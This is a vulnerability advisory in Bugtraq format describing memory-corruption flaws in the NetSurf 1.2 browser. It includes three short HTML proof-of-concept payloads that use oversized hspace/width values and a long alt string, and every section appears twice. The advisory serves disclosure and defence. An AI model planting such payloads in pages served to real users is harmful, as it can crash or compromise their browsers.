NetSurf Multiple Memory Corruption Vulnerabilities
BID:33279
Info
NetSurf Multiple Memory Corruption Vulnerabilities
| Bugtraq ID: | 33279 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2009 12:00AM |
| Updated: | Jan 16 2009 08:42PM |
| Credit: | Jeremy Brown |
| Vulnerable: |
NetSurf NetSurf 1.2 |
| Not Vulnerable: | |
Discussion
NetSurf Multiple Memory Corruption Vulnerabilities
NetSurf is prone to multiple memory-corruption vulnerabilities.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely crash the application.
NetSurf 1.2 is vulnerable; other versions may also be affected.
NetSurf is prone to multiple memory-corruption vulnerabilities.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely crash the application.
NetSurf 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
NetSurf Multiple Memory Corruption Vulnerabilities
The following proofs of concept are available:
1. <applet code='test.class' hspace='32767'> <img src='test.jpg' hspace='32767'>
2. <iframe src='test.jpg' width='2147483584'> <hr width='2147483584'>
3. <img src='test.jpg' alt='"A" x ~2000'>
The following proofs of concept are available:
1. <applet code='test.class' hspace='32767'> <img src='test.jpg' hspace='32767'>
2. <iframe src='test.jpg' width='2147483584'> <hr width='2147483584'>
3. <img src='test.jpg' alt='"A" x ~2000'>
Solution / Fix
NetSurf Multiple Memory Corruption Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].